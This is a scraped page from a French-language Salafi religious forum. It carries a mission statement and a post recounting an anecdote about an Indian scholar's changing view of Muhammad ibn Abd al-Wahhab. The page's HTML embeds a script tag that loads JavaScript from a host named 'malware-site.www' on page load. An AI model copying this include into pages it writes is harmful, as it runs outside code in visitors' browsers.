ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Sam 28 Nov - 13:28 par assalafia

http://nashr.qurancomplex.gov.sa/download/Al_Madinah_Mushaf_Win_Setup_15-4-2015.rar

Juillet 2017

LunMarMerJeuVenSamDim
     12
3456789
10111213141516
17181920212223
24252627282930
31      

Calendrier Calendrier

anipassion.com

    Le shaykh indien qui maudissait Mohammed ibn Abdelwahab a la fin de chacun de ses cours

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    Le shaykh indien qui maudissait Mohammed ibn Abdelwahab a la fin de chacun de ses cours

    Message par assalafia le Sam 16 Nov - 14:17

    Surprised [url=]

    Shaykh Mohammad Ibn Ibrâhîm Âl Ash-Shaykh dit:

    Je vais raconter l’histoire de ‘Abd Ar-Rahmân Al Bakry qui est parmi les gens du Najd.
    Il était d’abord du nombre des étudiants en science auprès de l’oncle le shaykh ‘Abd Allah et autre.
    Puis il décida d’ouvrir une école à ‘Omân dans laquelle il enseignait le Tawhîd, et qui était financée par ses propres moyens.
    Quand il n’avait plus rien, il prenait des marchandises auprès de quelqu’un et voyageait vers l’Inde où il pouvait rester jusqu’à six mois.

    Le shaykh Bakry a dit : En Inde, j’étais voisin d’une mosquée dans laquelle il y avait un enseignant.
    Lorsqu’il terminait son cours, ils maudissaient tous Ibn ‘Abd Al Wahhâb.
    Quand il sortait de la mosquée, il passait me voir et disait : Moi je maîtrise la langue arabe mais j’aime l’entendre des Arabes.
    Et je lui donnais à boire de l’eau froide.J’ai donc été attristé par ce qu’il faisait lors de son cours.Il dit : J’ai alors rusé, je l’ai invité et j’ai pris "Kitâb At-Tawhîd" duquel j’ai retiré le prologue et je l’ai posé sur une étagère chez moi avant sa venue.Quand il fut là, je lui dit : Tu m’excuses je vais aller chercher un melon, et je suis parti.A mon retour, je l’ai trouvé en train de lire tout en agitant sa tête.
    Il m’a dit : De qui est ce livre ? Ces titres de chapitres ressemblent à ceux d’Al Boukhâry, ceci par Allah est la façon de faire d’Al Boukhâry ?!J’ai dis : je ne sais pas.
    Puis je lui ai dit : Allons voir le shaykh Al Ghazwy pour lui demander -Il possédait une grande bibliothèque et était l’auteur d’une réplique au livre Jâmi’ al bayân-.Nous entrâmes donc chez lui et j’ai dit à Al Ghazwy : J’avais des feuilles et le shaykh m’a demandé qui en est l’auteur ? Sans que je sache.

    Al Ghazwy a alors compris ce qui était voulu.
    Il appela quelqu’un et lui demanda d’amener le livre "Majmou’at At-Tawhîd", que l’on apporta.Il compara entre les deux et dit : il est de Mohammad Ibn ‘Abd Al Wahhâb.Le savant indien dit, énervé et à voix haute : le mécréant ?!Nous nous sommes tus un court moment et lui de même.Il s’apaisa et se calma puis dit : S’il est l’auteur de ce livre alors nous avons été injustes envers lui.
    Après cela, il invoquait tous les jours, lui et ses élèves, en sa faveur.Certains de ses élèves s’éparpillèrent en Inde, et lorsqu’ils terminaient leurs cours ils invoquaient tous pour le shaykh Mohammad Ibn ‘Abd Al Wahhâb.





    فتاوى ورسائل سماحة الشيخ محمد بن إبراهيم آل الشيخ (1/75-7

      La date/heure actuelle est Ven 21 Juil - 23:41